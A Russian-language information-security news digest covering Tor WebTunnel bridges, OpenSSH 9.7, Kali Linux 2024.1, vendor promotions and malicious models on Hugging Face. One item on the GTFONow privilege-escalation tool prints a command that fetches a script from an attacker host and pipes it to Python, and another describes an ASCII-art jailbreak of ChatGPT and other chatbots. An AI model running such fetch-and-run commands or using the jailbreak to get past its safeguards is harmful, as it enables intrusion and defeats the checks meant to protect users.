Информационная безопасность *

Разработчики Tor Project объявили о запуске новой функции — мостов WebTunnel, которые работают на основе устойчивого к обнаружению HTTPT-прокси и позволяют трафику Tor лучше смешиваться с обычным HTTPS-трафиком.

Мосты Tor представляют собой ретрансляторы, не перечисленные в публичном каталоге Tor, которые позволяют маскировать соединения пользователей. Так как уже довольно давно найдены способы обнаружения и блокировки таких соединений (например, в Китае), Tor также использует мосты obfsproxy, которые добавляют дополнительный уровень обфускации.

В Tor Project пояснили, что мосты WebTunnel предназначены для имитации зашифрованного трафика (HTTPS) и основаны на HTTPT. Они оборачивают полезную нагрузку соединения в WebSocket-подобное HTTPS-соединение, которое выглядит как обычный HTTPS (WebSocket). Для стороннего наблюдателя это обычное HTTP-соединение, в ходе которого пользователь просто просматривает веб-страницы.

«Фактически, WebTunnel настолько похож на обычный веб-трафик, что он может сосуществовать на одном эндпоинте с сайтом, то есть пользоваться тем же доменом, IP-адресом и портом. Такое сосуществование позволяет стандартному обратному прокси направлять как обычный веб-трафик, так и WebTunnel на соответствующие серверы приложений. В результате, когда кто-то пытается посетить сайт по общему сетевому адресу, он просто увидит содержимое этого адреса сайта и не обнаружит существование моста WebTunnel», — пояснили в Tor Project.

Около 26% компаний в России планируют внедрить ИИ для повышения информационной безопасности

Более половины российских компаний за 2023 год увеличили бюджеты на развитие систем информзащиты в среднем на 20% — свидетельствуют итоги опросов в рамках исследования Yandex Cloud и компании «Деловые решения и технологии». Доля ИБ‑расходов в российском бизнесе составила 15% от общего бюджета на ИТ. Среди основных статей расходов на ИБ: обновление ПО (75%), оборудования (73%) и обучение персонала (43%).

Для защиты инфраструктуры стали чаще использоваться модели машинного обучения, а для безопасной разработки — облачные технологии. При этом ИИ‑алгоритмы чаще применяют для решения двух задач: обнаружения аномалий в большом объёме данных и управления инцидентами. Искусственный интеллект при автоматизации ИБ‑процессов наиболее часто используют компании финансового сектора — это подтвердили 71% опрошенных из отрасли.

Возможность автоматизировать использование ИБ‑сервисов — один из критериев миграции на облачные платформы. 74% компаний оценивают безопасность работы с облачными провайдерами выше среднего. Одновременно с этим оценка рисков при миграции данных в облако стала базовым правилом для компаний, отмечают респонденты.

В исследовании приняли участие более 300 представителей российских компаний. Глубинные и количественные интервью прошли директора по ИТ и информационной безопасности, руководители программ цифровой трансформации, ИБ‑ и ИТ‑специалисты.

Подробности исследования — по ссылке.

Глава Минцифры РФ Максут Шадаев заявил, что российские власти не блокируют зарубежные веб-сайты с технологиями искусственного интеллекта (ИИ). Он сказал об этом на пленарной сессии Дня искусственного интеллекта в рамках международной выставки-форума «Россия».

«Мы не блокируем зарубежные сайты, связанные с ИИ», — рассказал Шадаев.

В начале февраля 2024 года компания OpenAI сообщила российским СМИ, что разработанный ею чат-бот ChatGPT недоступен в России. Компания предоставила официальный список стран из почти 190 стран, где ChatGPT доступен, России среди них нет.

Другие популярные в мире чат-боты со встроенным искусственным интеллектом, среди которых Copilot от Microsoft и Gemini (ранее Bard) от Google, также не работают на территории России. Причём запреты на использование этих сервисов исходят от самих разработчиков.

Например, при открытии ИИ-сервиса Google появляется сообщение: «Gemini пока не поддерживается в вашей стране. Мы сообщим, когда это изменится».

ГК «Солар» и Оперативно‑аналитический центр (ОАЦ) при Президенте Республики Беларусь (РБ) заключили соглашение о сотрудничестве в области обмена информацией и опытом по противодействию киберугрозам. Партнёрство должно укрепить усилия стран по обеспечению международной киберустойчивости, рассказали информационной службе Хабра в пресс‑службе ИБ‑компании. По новому документу, центр исследования киберугроз Solar 4RAYS становится одним из ключевых источников аналитики для ОАЦ при Президенте РБ.

В рамках взаимодействия ГК «Солар» и ОАЦ при Президенте РБ будут обмениваться статистическими, аналитическими и справочными материалами, представляющими взаимный интерес, практическим опытом работы. Также в плане совместных активностей значатся разработка методических материалов и рекомендаций, проведение консультаций, семинаров и конференций по различным аспектам защиты информации, включая, борьбу с компьютерными атаками и утечками по вине внутренних нарушителей и деятельность по защите от утечек информации.

Запись вебинара «Как не потерять бизнес в 2024? Основы информационной безопасности»

Сегодня мы провели вебинар про атаки на инфраструктуру и защиту от них. Делимся с вами записью.

Регистрируйтесь на митапы про UX, сети и Python.

Selectel UX & Research Meetup#3 «Общение с пользователями, заказчиками и коллегами» — регистрация

Selectel Network Meetup#9 «Это база: знания, которые нужны сетевику каждый день» — регистрация.

Selectel Python Meetup «Пилим решение: выбираем фреймворк и архитектуру, сравниваем Python и Go» — регистрация.

Защитники vs Атакующие. Готов присоединиться к битве? Выбирай свою сторону!

Присоединяйся к Всероссийской студенческой кибербитве и сразись за ИТ‑инфраструктуру виртуального города.

? 23–25 мая
? Призовой фонд — 200 тыс. руб.

Финал битвы состоится в рамках киберфестиваля Positive Hack Days 2 в «Лужниках».

Мы ищем ребят, которые будут взламывать объекты инфраструктуры на базе виртуального киберполигона, и ребят, которые эти объекты будут защищать.

Если ты:

• cтудент или аспирант российского вуза

• имеешь опыт участия в CTF‑соревнованиях/решения задач на киберполигоне Standoff 365

• можешь собрать команду или уже в ней состоишь

• хочешь попробовать свои силы в максимально приближенных к реальности условиях

Тогда ты точно тот, кто нам нужен.

Готов принять вызов? Регистрируйся по ссылке (успей до 19 марта).

Реклама
ООО «Телеком Интеграция»
ИНН: 7731642944 
erid: 2VtzqvfXkiX

Вышел проект OpenSSH 9.7. В новой версии открытой реализации клиента и сервера для работы по протоколам SSH 2.0 и SFTP началось внесение изменений, предшествующих будущему прекращению поддержки ключей на базе алгоритма DSA.

В OpenSSH 9.7 предоставлена опция для отключения DSA на стадии компиляции, но сборка по умолчанию с поддержкой DSA пока сохранена. В следующем выпуске режим сборки будет изменён на отключение DSA по умолчанию, а в начале 2025 года реализация DSA будет удалена из кодовой базы проекта.

В новом выпуске OpenSSH предложен новый тип таймаутов в ssh и sshd, включаемый через указания значения global в директиве ChannelTimeout. В этом режиме OpenSSH отслеживает все открытые каналы и закрывает их разом, если во всех из них за указанный промежуток времени отсутствовал трафик. Например, когда к хосту одновременно открыты каналы для SSH-сеанса и перенаправления x11, новый режим позволяет закрыть сразу оба канала, если они неактивны, вместо раздельного отслеживания таймаутов для каждого канала.

Также из изменений в OpenSSH 9.7 отмечается значительное улучшение тестирования совместимости с проектом PuTTY.

Источник: OpenNET.

Облачный файрвол Selectel вышел из беты ?

В течение полугода мы тестировали услугу, собирали вашу обратную связь и вносили улучшения. Оставили главное: облачный файрвол продолжает быть бесплатным и фильтровать весь IPv4-трафик. И добавили максимальную надежность для всех сетевых сценариев.

Облачный файрвол — это бесплатный классический stateful‑файрвол в облаке Selectel, который позволяет настроить сетевую безопасность в приватных сетях облака с доступом из интернета через публичные IP‑адреса.

Что умеет облачный файрвол

• Сохраняет состояния сессий (stateful).

• Фильтрует входящий или исходящий трафик приватной подсети, который проходит через облачный роутер.

• Фильтрует интернет‑трафик, идущий на публичные IP‑адреса.

• Открывает/закрывает определенные порты или диапазон портов.

• Разрешает/запрещает доступ с выбранных IP‑адресов или подсетей.

Облачный файрвол гибко адаптируется под ваши нагрузки, позволяя делегировать заботу о наличии необходимых ресурсов для его работы Selectel. Чтобы протестировать услугу и убедиться в этом самостоятельно, переходите по ссылке.

​​? 12 марта, 16:00 

? Бесплатный вебинар «Как не потерять бизнес в 2024? Основы информационной безопасности»

За 2023 год участились случаи взлома сервисов, хакерских атак, утечек персональных данных. Поговорим, как обеспечить безопасность инфраструктуры и не потерять данные клиентов. Рассмотрим, как готовиться к новым угрозам и эффективно им противодействовать.

Основные темы

? Аналитика атак за 2023 год

? DDoS, уязвимости на периметре, брутфорс

? Сетевая защита и защита инфраструктуры

Специальный бонус для 20 участников — бесплатное сканирование уязвимостей до 10 публичных адресов Selectel. Подробнее об условиях — на вебинаре.

Регистрируйтесь на митап, задавайте вопросы в форме и поучаствуйте в розыгрыше Тирекса ➡️

Основатель Telegram Павел Дуров прокомментировал с технической точки зрения ситуацию с глобальным сбоем в работе популярных соцсетей, мессенджерей и сервисов 5 марта 2024 года.

Миллионы людей регистрировались и делились контентом в Telegram за последний час, пока Instagram** и Facebook** не работали.

Интересно, что Telegram надёжнее этих сервисов — несмотря на то, что тратит на инфраструктуру в несколько раз меньше на одного пользователя.

У нас также примерно в 1000 раз (!) меньше штатных сотрудников, чем у Meta*, но нам удаётся запускать новые функции и внедрять инновации быстрее.

В течение 2023 года Telegram был недоступен всего 9 минут из 525 600 минут в году. Это 99,999983% времени безотказной работы.

<sub>Meta Platforms*, а также принадлежащие ей социальные сети Facebook** и Instagram**:
* — признана экстремистской организацией, её деятельность в России запрещена
** — запрещён в России</sub>

Вызывайте санитайзер! Фаззим исполняемые файлы при помощи AFL++ с санитайзерами

У нас вышел первый материал на Хакере, приятного чтения (если есть платная подписка).

Фаззинг, как ты, наверное, знаешь, — это техника, которая позволяет автоматизировать поиск уязвимостей в софте. Бывает фаззинг методом «черного ящика», когда у нас нет исходников программы, а бывает основанный на покрытии — то есть применяемый к исходникам. В этой статье сосредоточимся на втором виде и на примере AFL++ разберем, какую роль здесь играют санитайзеры и как их применять.

В этой статье идет речь о фаз­зинге прог­рамм. Нашим инс­тру­мен­том будет AFL++ — фаз­зер, ори­енти­рован­ный на пок­рытие. Это зна­чит, что он собира­ет информа­цию о пок­рытии для каж­дого изме­нен­ного вхо­да, что­бы обна­ружить новые пути выпол­нения и потен­циаль­ные ошиб­ки. Если у тебя есть исходник прог­раммы, AFL может встав­лять вызовы фун­кций в начало каж­дого базово­го бло­ка, нап­ример в фун­кции и цик­лы.

«Лаборатория Касперского» представила онлайн-игру «Интерак­тив­ный симулятор атаки программ‑вымогателей», симулирующую кибератаку на компанию с использованием программы-вымогателя.

Пользователю нужно в режиме реального времени принимать решения за ИБ-специалиста, чтобы противостоять злоумышленникам.

По сюжету игры главный герой выходит на работу в компанию среднего размера, занимающуюся продажей потребительской электроники. Приступив к своим обязанностям, он обнаруживает, что организацию пытаются атаковать злоумышленники. Далее перед ним встаёт выбор — сообщить о случившемся руководству или самостоятельно провести небольшое исследование. От дальнейших действий пользователя зависит, пострадает ли компания от программы-вымогателя и как именно завершится этот инцидент.

Состоялся выпуск Kali Linux 2024.1 с 4 новыми инструментами и обновленным пользовательским интерфейсом.

Разработчики проекта из Offensive Security также выпустили для новой сборки системы новые визуальные элементы, включая обои и обновления загрузочного меню и экрана входа в систему.

Помимо визуальных улучшений релиз Kali Linux 2024.1 получил версию ядра 6.6, в проект добавлены четыре новых ИБ-инструмента:

• blue-hydra — сервис для обнаружения Bluetooth-устройств;

• opentaxii — имплементация сервера TAXII от EclecticIQ;

• readpe — инструменты командной строки для работы с PE-файлами Windows;

• snort — гибкая система обнаружения сетевых вторжений.

Сегодня поговорим об инструменте GTFONow.

Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.

Основные особенности:

• Автоматическая эксплуатация неправильно настроенных разрешений sudo.

• Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.

• Автоматическая эксплуатация неправильных настроенных компонентов ОС.

• Автоматическая эксплуатация через SSH‑ключи.

• Автоматическая эксплуатация через файл используемый в cron.

• Автоматическая эксплуатация через переменную окружения LD_PRELOAD.

• Легкий запуск без файлов с помощью

curl http://attackerhost/gtfonow.py | python

https://github.com/Frissi0n/GTFONow

Российский аналог «Википедии» под названием «Руниверсалис» сообщил Роскомнадзору, что ведомство должно заблокировать доступ к оригинальному ресурсу из-за наличия там страницы с руководством о том, «что делать, если "Википедия" заблокирована» (с рассказами о VPN и прочем).

В Госдуме пояснили СМИ, что «Википедию» могут заблокировать в России по новому закону о запрете популяризации VPN. Как сообщил зампред комитета Госдумы по информационной политике Антон Горелкин, необходимое для этого техническое решение уже разрабатывается сотрудниками РОЦИТ (Региональный общественный центр интернет-технологий).

«Законные основания для блокировки "Википедии" есть, осталось сделать так, чтобы это не вызвало резкого дискомфорта у пользователей», — сообщил Горелкин. По его словам, вся информация из онлайн-энциклопедии уже продублирована на портале БРЭ, «Рувики» и «Руниверсалисе». «Осталось сделать так, чтобы по ссылке на статью "Википедии" пользователю предлагалось открыть ее безопасный вариант на одном из российских аналогов. Необходимое для этого техническое решение уже разрабатывается экспертами РОЦИТ», — добавил Горелкин.

С 1 марта 2024 года в России вступил в силу запрет на популяризацию сервисов, позволяющих обходить блокировки в интернете. Доступ к материалам, популяризирующим подобные средства или рекламирующим средства обхода блокировок для доступа к запрещенному контенту, будет блокироваться Роскомнадзором.

Исследователи раскрыли хак, как убрать из ChatGPT цензуру и заставить ИИ отвечать без ограничений со стороны разработчиков. Оказалось. что для этого нужно просто замаскировать запрос под арт ASCII.

После этого ChatGPT может сообщить различные ранее запрещённые для раскрытия инструкции и заблокированную информацию. Этот баг есть во всех популярных нейросетях — GPT-3.5, GPT-4, Gemini, Claude и Llama2.

Группа компаний (ГК) «Солар» запустила сервис постоянного контроля защищённости внешнего IT‑периметра Solar CPT (Continuous Penetration Testing). Сервис находит критические уязвимости и недостатки меняющегося внешнего IT‑периметра. Найденные в ходе сканирования недостатки верифицируются экспертами анализа защищённости, после чего пользователь системы получает практические рекомендации по защите. В настоящее время ведутся пилотные проекты с организациями из IT‑отрасли и перерабатывающей промышленности.

По словам разработчиков, Solar CPT позволит регулярно актуализировать картину внешнего периметра и лучше защищать жизненно важную инфраструктуру от критичных угроз. Сервис учитывает многолетний опыт экспертов ГК «Солар» по анализу защищённости. Решение постоянно обновляется с учётом изменяющихся техник и тактик злоумышленников.

Как утверждает ГК «Солар», Solar CPT реализуется «под ключ». Эксперты по тестированию на проникновение собирают информацию об инфраструктуре, сканируют её средствами платформы, а затем вручную проверяют найденные уязвимости и недостатки, что помогает снизить число ложных срабатываний по сравнению с автоматическими сканерами.

Руководитель отдела анализа защищённости Solar JSOC ГК «Солар» Александр Колесов объяснил, что сервис Solar CPT представляет собой часть автоматизированных действий пентеста в сочетании с полноценной экспертизой специалистов.

Профильные сетевые эксперты предположили, что почти часовой сбой в работе различных мессенджеров и сервисов в Рунете 27 февраля мог произойти из-за массового тестирования похожей на Active Probing технологии, которая уже много лет успешно работает в Китае.

В своей заметке на ресурсе ntc.party пишет о сканировании и ValdikSS, приводя в пример VPN-сервис Windscribe. Примерно с середины января 2024 он обнаружил блокировки, срабатывающие после определённых действий на определённое время, только для IP-адреса, с которого они производились.

InSales запустила программу поиска уязвимостей на платформе BI.ZONE Bug Bounty. Программа охватывает сайт, тикет‑систему, мобильные приложения для iOS и Android inSales. inSales представляет собой платформу управления онлайн‑торговлей через сайт, на маркетплейсах, в социальных сетях и мессенджерах. Размер вознаграждения зависит от критичности обнаруженных уязвимостей (до ₽100 тысяч), рассказали информационной службе Хабра в пресс‑службе BI.ZONE.

По словам директора по информационной безопасности inSales Константина Липаткина, запуск программы на BI.ZONE Bug Bounty позволит укрепить защиту данных клиентов и выявить потенциальные угрозы во внешних сервисах, что позволит дополнить уже реализуемые меры по обеспечению надежности платформы.

Эксперты из JFrog выявили в репозитории Hugging Face вредоносные модели машинного обучения, установка которых может привести к выполнению кода атакующего для получения контроля за системой пользователя.

Проблема вызвана тем, что некоторые форматы распространения моделей допускают встраивание исполняемого кода, например, модели, использующие формат pickle, могут включать сериализированные объекты на языке Python, а также код, выполняемый при загрузке файла, а модели Tensorflow Keras могут исполнять код через Lambda Layer.

Для предотвращения распространения подобных вредоносных моделей в Hugging Face применяется сканирование на предмет подстановки сериализированного кода, но выявленные вредоносные модели показывают, что имеющиеся проверки можно обойти.

Кроме того, Hugging Face в большинстве случаев лишь помечает модели опасными, не блокирую к ним доступ.

Всего выявлено около 100 потенциально вредоносных моделей, 95% из которых предназначены для использования с фреймворком PyTorch, а 5% c Tensorflow.

Наиболее часто встречающимися вредоносными изменениями названы захват объекта, организация внешнего входа в систему (reverse shell), запуск приложений и запись в файл.

Источник: OpenNET.